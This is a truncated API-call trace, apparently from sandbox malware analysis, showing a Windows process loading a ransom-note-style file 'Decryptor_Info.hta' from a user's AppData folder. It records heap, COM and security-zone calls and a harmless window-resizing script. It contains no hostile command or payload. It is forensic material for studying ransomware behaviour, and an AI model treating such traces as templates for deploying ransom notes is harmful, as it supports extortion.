StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0xfffa0, riid=0x766597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x22ef00 | out: ppvObject=0x22ef00*=0x0) returned 0x80004002 [0112.855] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0xfffa0, riid=0x76663e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x22eef0 | out: ppvObject=0x22eef0*=0x0) returned 0x80004002 [0112.855] StdGlobalInterfaceTable:IUnknown:AddRef (This=0xfffa0) returned 0x2 [0112.855] IUnknown:AddRef (This=0x477200) returned 0x2 [0112.855] IUnknown:Release (This=0x477200) returned 0x1 [0112.855] ??2@YAPAXI@Z () returned 0x2590998 [0112.855] GetTickCount () returned 0x1151ed7 [0112.855] ??2@YAPAXI@Z () returned 0x2590fe8 [0112.855] malloc (_Size=0x40) returned 0x2591058 [0112.855] malloc (_Size=0x104) returned 0x25910a0 [0112.855] ??2@YAPAXI@Z () returned 0xfffc8 [0112.855] CoGetObjectContext (in: riid=0x74f90270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22ef98 | out: ppv=0x22ef98*=0x477200) returned 0x0 [0112.855] IUnknown:Release (This=0x477200) returned 0x1 [0112.856] CoGetObjectContext (in: riid=0x74f90270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22ef98 | out: ppv=0x22ef98*=0x477200) returned 0x0 [0112.856] IUnknown:Release (This=0x477200) returned 0x1 [0112.856] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4b9ed8 [0112.856] GetCurrentThreadId () returned 0xe9c [0112.856] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0112.856] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x30) returned 0x4aa958 [0112.857] StrCmpIW (psz1="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", psz2="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta") returned 0 [0112.857] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x10) returned 0x4b9ef0 [0112.857] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4ba728 [0112.857] GetCurrentThreadId () returned 0xe9c [0112.857] realloc (_Block=0x0, _Size=0xc8) returned 0x25911b0 [0112.857] _wcsicmp (_String1="", _String2="") returned 0 [0112.858] SysStringLen (param_1="\r\r\n try {\r\r\n var windowWidth = 720;\r\r\n var windowHeight = 320;\r\r\n window.resizeTo(windowWidth - 1, windowHeight - 1);\r\r\n window.resizeTo(windowWidth, windowHeight);\r\r\n window.moveTo((screen.availWidth - windowWidth) / 2, (screen.availHeight - windowHeight) / 2);\r\r\n } catch (e) { }\r\r\n ") returned 0x165 [0112.858] ??2@YAPAXI@Z () returned 0x2591280 [0112.858] malloc (_Size=0x804) returned 0x25912a8 [0112.858] ??2@YAPAXI@Z () returned 0x2591ab8 [0112.858] malloc (_Size=0x10) returned 0xf13d0 [0112.858] malloc (_Size=0x104) returned 0x2591c20 [0112.859] malloc (_Size=0x204) returned 0x2591d30 [0112.859] malloc (_Size=0x404) returned 0x2591f40 [0112.860] ??3@YAXPAX@Z () returned 0x1 [0112.860] malloc (_Size=0x80) returned 0xfd908 [0112.860] malloc (_Size=0x804) returned 0x2592350 [0112.860] malloc (_Size=0x5b4) returned 0x2592b60 [0112.861] ??2@YAPAXI@Z () returned 0x2591ab8 [0112.861] free (_Block=0x25912a8) [0112.861] ??3@YAXPAX@Z () returned 0x1 [0112.861] free (_Block=0xf13d0) [0112.861] free (_Block=0xfd908) [0112.861] free (_Block=0x2592350) [0112.861] free (_Block=0x2591f40) [0112.861] free (_Block=0x2591d30) [0112.861] free (_Block=0x2591c20) [0112.861] ??2@YAPAXI@Z () returned 0x2591280 [0112.862] ??2@YAPAXI@Z () returned 0x25912b8 [0112.862] malloc (_Size=0xc) returned 0xf13d0 [0112.862] ??2@YAPAXI@Z () returned 0x25912d8 [0112.862] CoGetObjectContext (in: riid=0x74f90270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22f0b8 | out: ppv=0x22f0b8*=0x477200) returned 0x0 [0112.862] IUnknown:Release (This=0x477200) returned 0x1 [0112.862] ??2@YAPAXI@Z () returned 0x2591320 [0112.863] CoGetObjectContext (in: riid=0x74f90270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22f108 | out: ppv=0x22f108*=0x477200) returned 0x0 [0112.863] IUnknown:Release (This=0x477200) returned 0x1 [0112.863] ??2@YAPAXI@Z () returned 0x2591390 [0112.863] ISystemDebugEventFire:IsActive (This=0x4ab4e0) returned 0x1 [0112.864] CoGetObjectContext (in: riid=0x74f90270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22f104 | out: ppv=0x22f104*=0x477200) returned 0x0 [0112.864] IUnknown:Release (This=0x477200) returned 0x1 [0112.864] malloc (_Size=0x658) returned 0x2591410 [0112.864] GetCurrentThreadId () returned 0xe9c [0112.865] GetCurrentThreadId () returned 0xe9c [0112.866] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x4923b0 [0112.866] GetCurrentThreadId () returned 0xe9c [0112.867] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x24) returned 0x4923e0 [0112.867] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.867] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.868] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x30) returned 0x4aa990 [0112.870] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x30c) returned 0x4bf1a0 [0112.870] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x4bcf78 [0112.870] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x4bcf98 [0112.870] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x4bcfb8 [0112.870] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x4bcfd8 [0112.870] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x4bcff8 [0112.870] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x4bd018 [0112.870] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x4bd038 [0112.870] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x4bd058 [0112.870] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x4bd078 [0112.870] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x4bd098 [0112.870] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x4bd0b8 [0112.870] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x4bd0d8 [0112.870] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x10) returned 0x4b9f08 [0112.870] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4b9f20 [0112.870] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.871] IsCharSpaceW (wch=0x77) returned 0 [0112.871] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.871] IsCharSpaceW (wch=0x77) returned 0 [0112.871] GetCurrentThreadId () returned 0xe9c [0112.871] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.871] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.871] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.871] IsCharSpaceW (wch=0x77) returned 0 [0112.871] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.872] IsCharSpaceW (wch=0x77) returned 0 [0112.872] GetCurrentThreadId () returned 0xe9c [0112.872] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.872] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.872] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.872] IsCharSpaceW (wch=0x65) returned 0 [0112.872] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.873] IsCharSpaceW (wch=0x65) returned 0 [0112.873] malloc (_Size=0x204) returned 0x2593120 [0112.876] GetCurrentThreadId () returned 0xe9c [0112.876] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.876] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab528 [0112.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x128) returned 0x4bf4b8 [0112.877] ??2@YAPAXI@Z () returned 0x2591a70 [0112.877] GetCurrentThreadId () returned 0xe9c [0112.877] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab570 [0112.877] IsWindow (hWnd=0x301f0) returned 1 [0112.878] IsWindowVisible (hWnd=0x301f0) returned 0 [0112.881] GetCurrentThreadId () returned 0xe9c [0112.882] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.882] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.882] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.882] IsWindow (hWnd=0x301f0) returned 1 [0112.882] IsWindowVisible (hWnd=0x301f0) returned 0 [0112.882] GetCurrentThreadId () returned 0xe9c [0112.883] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.883] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.883] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.883] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4bd0f8 [0112.884] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x492410 [0112.884] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.884] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab5b8 [0112.886] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.887] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x22eb70, fWinIni=0x0 | out: pvParam=0x22eb70) returned 1 [0112.888] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.888] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x492440 [0112.888] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.889] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.891] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x22eb70, fWinIni=0x0 | out: pvParam=0x22eb70) returned 1 [0112.891] GetCurrentThreadId () returned 0xe9c [0112.891] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.891] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.892] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.892] IsWindow (hWnd=0x301f0) returned 1 [0112.892] IsWindowVisible (hWnd=0x301f0) returned 0 [0112.896] GetCurrentThreadId () returned 0xe9c [0112.896] GetCurrentThreadId () returned 0xe9c [0112.896] ISystemDebugEventFire:IsActive (This=0x4ab4e0) returned 0x1 [0112.897] ??3@YAXPAX@Z () returned 0x1 [0112.897] free (_Block=0x25911b0) [0112.897] GetCurrentThreadId () returned 0xe9c [0112.897] GetCurrentThreadId () returned 0xe9c [0112.897] GetCurrentThreadId () returned 0xe9c [0112.897] GetCurrentThreadId () returned 0xe9c [0112.897] GetCurrentThreadId () returned 0xe9c [0112.897] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4bd720 | out: hHeap=0x450000) returned 1 [0112.897] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490a18 | out: hHeap=0x450000) returned 1 [0112.897] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0112.897] GetCurrentThreadId () returned 0xe9c [0112.898] SetEvent (hEvent=0x1dc) returned 1 [0112.901] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x498880 | out: hHeap=0x450000) returned 1 [0112.905] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x38) returned 0x48eb90 [0112.905] StrChrW (lpStart="HTA:APPLICATION", wMatch=0x3a) returned=":APPLICATION" [0112.905] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x4b9f38 [0112.905] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c) returned 0x4ba750 [0112.905] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x492470 [0112.905] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4bd118 [0112.905] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xe) returned 0x4b9f50 [0112.905] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab600 [0112.905] StrCmpNICW (lpStr1="on", lpStr2="WI", nChar=2) returned -8 [0112.905] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2a) returned 0x4aa9c8 [0112.905] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x4a7020 [0112.906] StrCmpNICW (lpStr1="on", lpStr2="SI", nChar=2) returned -4 [0112.906] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1a) returned 0x4ba778 [0112.906] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x6) returned 0x4a7030 [0112.906] StrCmpNICW (lpStr1="on", lpStr2="SC", nChar=2) returned -4 [0112.906] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1a) returned 0x4ba7a0 [0112.906] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x6) returned 0x4a7040 [0112.906] StrCmpNICW (lpStr1="on", lpStr2="RE", nChar=2) returned -3 [0112.906] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2a) returned 0x4aaa00 [0112.906] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x4a7050 [0112.906] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4ab600, Size=0x60) returned 0x4a98a0 [0112.906] StrCmpNICW (lpStr1="on", lpStr2="MI", nChar=2) returned 2 [0112.906] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2a) returned 0x4aaa38 [0112.906] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x6) returned 0x4a7060 [0112.906] StrCmpNICW (lpStr1="on", lpStr2="MA", nChar=2) returned 2 [0112.906] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x4924a0 [0112.906] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x6) returned 0x4a7070 [0112.906] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4a98a0, Size=0x90) returned 0x498880 [0112.907] StrCmpNICW (lpStr1="on", lpStr2="CO", nChar=2) returned 12 [0112.907] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1a) returned 0x4ba7c8 [0112.907] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xa) returned 0x4b9f68 [0112.907] StrCmpNICW (lpStr1="on", lpStr2="BO", nChar=2) returned 13 [0112.907] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2c) returned 0x4aaa70 [0112.907] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x4a7080 [0112.907] StrCmpNICW (lpStr1="on", lpStr2="AP", nChar=2) returned 14 [0112.907] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4ba7f0 [0112.907] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x4924d0 [0112.907] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x498880, Size=0xd0) returned 0x498880 [0112.908] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4ba7f0 | out: hHeap=0x450000) returned 1 [0112.908] StrChrW (lpStart="HTA:APPLICATION", wMatch=0x3a) returned=":APPLICATION" [0112.908] StrCmpICW (pszStr1="PUBLIC", pszStr2="HTA") returned 8 [0112.908] StrCmpICW (pszStr1="HTA", pszStr2="HTA") returned 0 [0112.908] StrCmpICW (pszStr1="APPLICATION", pszStr2="APPLICATION") returned 0 [0112.910] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x490a18 [0112.910] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4b9f80 [0112.910] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0112.910] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490a70 [0112.912] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490a70 | out: hHeap=0x450000) returned 1 [0112.912] IsCharSpaceW (wch=0x75) returned 0 [0112.912] StrCmpNICW (lpStr1="url", lpStr2="URL", nChar=3) returned 0 [0112.912] IsCharSpaceW (wch=0x28) returned 0 [0112.912] IsCharSpaceW (wch=0x23) returned 0 [0112.912] IsCharSpaceW (wch=0x23) returned 0 [0112.912] IsCharSpaceW (wch=0x64) returned 0 [0112.912] IsCharSpaceW (wch=0x65) returned 0 [0112.912] IsCharSpaceW (wch=0x66) returned 0 [0112.912] IsCharSpaceW (wch=0x61) returned 0 [0112.912] IsCharSpaceW (wch=0x75) returned 0 [0112.912] IsCharSpaceW (wch=0x6c) returned 0 [0112.912] IsCharSpaceW (wch=0x74) returned 0 [0112.912] IsCharSpaceW (wch=0x23) returned 0 [0112.912] IsCharSpaceW (wch=0x41) returned 0 [0112.912] IsCharSpaceW (wch=0x50) returned 0 [0112.912] IsCharSpaceW (wch=0x50) returned 0 [0112.912] IsCharSpaceW (wch=0x4c) returned 0 [0112.912] IsCharSpaceW (wch=0x49) returned 0 [0112.912] IsCharSpaceW (wch=0x43) returned 0 [0112.912] IsCharSpaceW (wch=0x41) returned 0 [0112.912] IsCharSpaceW (wch=0x54) returned 0 [0112.912] IsCharSpaceW (wch=0x49) returned 0 [0112.912] IsCharSpaceW (wch=0x4f) returned 0 [0112.913] IsCharSpaceW (wch=0x4e) returned 0 [0112.913] IsCharSpaceW (wch=0x29) returned 0 [0112.913] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x36) returned 0x48ebd0 [0112.913] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4b9f98 [0112.913] IsCharSpaceW (wch=0x0) returned 0 [0112.913] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x48ebd0 | out: hHeap=0x450000) returned 1 [0112.913] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4b9f98 | out: hHeap=0x450000) returned 1 [0112.913] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0112.913] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x4bd138 [0112.913] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x4bd158 [0112.913] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4ba7f0 [0112.913] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4b9f80 | out: hHeap=0x450000) returned 1 [0112.913] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x490a70 [0112.914] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4bd138 | out: hHeap=0x450000) returned 1 [0112.914] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490a70 | out: hHeap=0x450000) returned 1 [0112.914] IsCharSpaceW (wch=0x75) returned 0 [0112.914] StrCmpNICW (lpStr1="url", lpStr2="URL", nChar=3) returned 0 [0112.914] IsCharSpaceW (wch=0x28) returned 0 [0112.914] IsCharSpaceW (wch=0x23) returned 0 [0112.914] IsCharSpaceW (wch=0x23) returned 0 [0112.914] IsCharSpaceW (wch=0x64) returned 0 [0112.914] IsCharSpaceW (wch=0x65) returned 0 [0112.914] IsCharSpaceW (wch=0x66) returned 0 [0112.914] IsCharSpaceW (wch=0x61) returned 0 [0112.914] IsCharSpaceW (wch=0x75) returned 0 [0112.914] IsCharSpaceW (wch=0x6c) returned 0 [0112.914] IsCharSpaceW (wch=0x74) returned 0 [0112.914] IsCharSpaceW (wch=0x23) returned 0 [0112.914] IsCharSpaceW (wch=0x41) returned 0 [0112.914] IsCharSpaceW (wch=0x50) returned 0 [0112.914] IsCharSpaceW (wch=0x50) returned 0 [0112.914] IsCharSpaceW (wch=0x4c) returned 0 [0112.914] IsCharSpaceW (wch=0x49) returned 0 [0112.914] IsCharSpaceW (wch=0x43) returned 0 [0112.914] IsCharSpaceW (wch=0x41) returned 0 [0112.914] IsCharSpaceW (wch=0x54) returned 0 [0112.914] IsCharSpaceW (wch=0x49) returned 0 [0112.914] IsCharSpaceW (wch=0x4f) returned 0 [0112.914] IsCharSpaceW (wch=0x4e) returned 0 [0112.914] IsCharSpaceW (wch=0x29) returned 0 [0112.914] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x36) returned 0x48ebd0 [0112.915] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4b9f80 [0112.915] IsCharSpaceW (wch=0x0) returned 0 [0112.915] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x54) returned 0x4a79d0 [0112.915] CoInternetIsFeatureEnabled (FeatureEntry=0x6, dwFlags=0x2) returned 0x0 [0112.917] IUnknown:AddRef (This=0x47c5c4) returned 0x4 [0112.917] IInternetSecurityManager:MapUrlToZone (in: This=0x741096bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", pdwZone=0x22d23c, dwFlags=0x0 | out: pdwZone=0x22d23c*=0xffffffff) returned 0x800c0011 [0112.917] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0112.917] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0112.917] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0112.917] IInternetSecurityManager:ProcessUrlAction (in: This=0x741096bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", dwAction=0x2000, pPolicy=0x22d240, cbPolicy=0x4, pContext=0x48ebdc*=0x23, cbContext=0x2a, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x22d240*=0x0) returned 0x0 [0112.918] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0112.918] IUnknown:Release (This=0x47c5c4) returned 0x3 [0112.918] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x50) returned 0x490a70 [0112.918] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x34) returned 0x48ec10 [0112.918] StrChrW (lpStart="default#APPLICATION", wMatch=0x23) returned="#APPLICATION" [0112.918] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x12) returned 0x4bd138 [0112.918] StrChrW (lpStart="default", wMatch=0x23) returned 0x0 [0112.918] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xa8) returned 0x4bd720 [0112.918] StrCmpNICW (lpStr1="#default", lpStr2="#default", nChar=8) returned 0 [0112.918] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x16) returned 0x4bd178 [0112.918] StrCmpNICW (lpStr1="#default", lpStr2="#default", nChar=8) returned 0 [0112.918] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x14) returned 0x4bd198 [0112.918] GetCurrentThreadId () returned 0xe9c [0112.918] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x47b430 [0112.918] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1a) returned 0x4ba818 [0112.918] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x94) returned 0x4bad98 [0112.918] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0112.918] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xa8) returned 0x4bd7d0 [0112.918] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2e) returned 0x4aaaa8 [0112.919] StrCmpNICW (lpStr1="#default", lpStr2="#default", nChar=8) returned 0 [0112.919] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x14) returned 0x4bd1b8 [0112.919] GetCurrentThreadId () returned 0xe9c [0112.919] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x32) returned 0x48ec50 [0112.919] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4bd138 | out: hHeap=0x450000) returned 1 [0112.919] StrChrW (lpStart="default#APPLICATION", wMatch=0x23) returned="#APPLICATION" [0112.919] StrCmpICW (pszStr1="APPLICATION", pszStr2="Application") returned 0 [0112.919] GetCurrentThreadId () returned 0xe9c [0112.919] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x24) returned 0x492500 [0112.920] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4bd138 [0112.920] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x88) returned 0x4a2b40 [0112.920] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab600 [0112.920] GetCurrentThreadId () returned 0xe9c [0112.920] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.920] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.920] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.920] GetCurrentThreadId () returned 0xe9c [0112.920] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x492530 [0112.921] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.921] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.921] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76e40000 [0112.921] GetProcAddress (hModule=0x76e40000, lpProcName="VariantClear") returned 0x76e43eae [0112.922] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.922] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.922] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.922] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.922] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0112.922] CoInternetIsFeatureEnabled 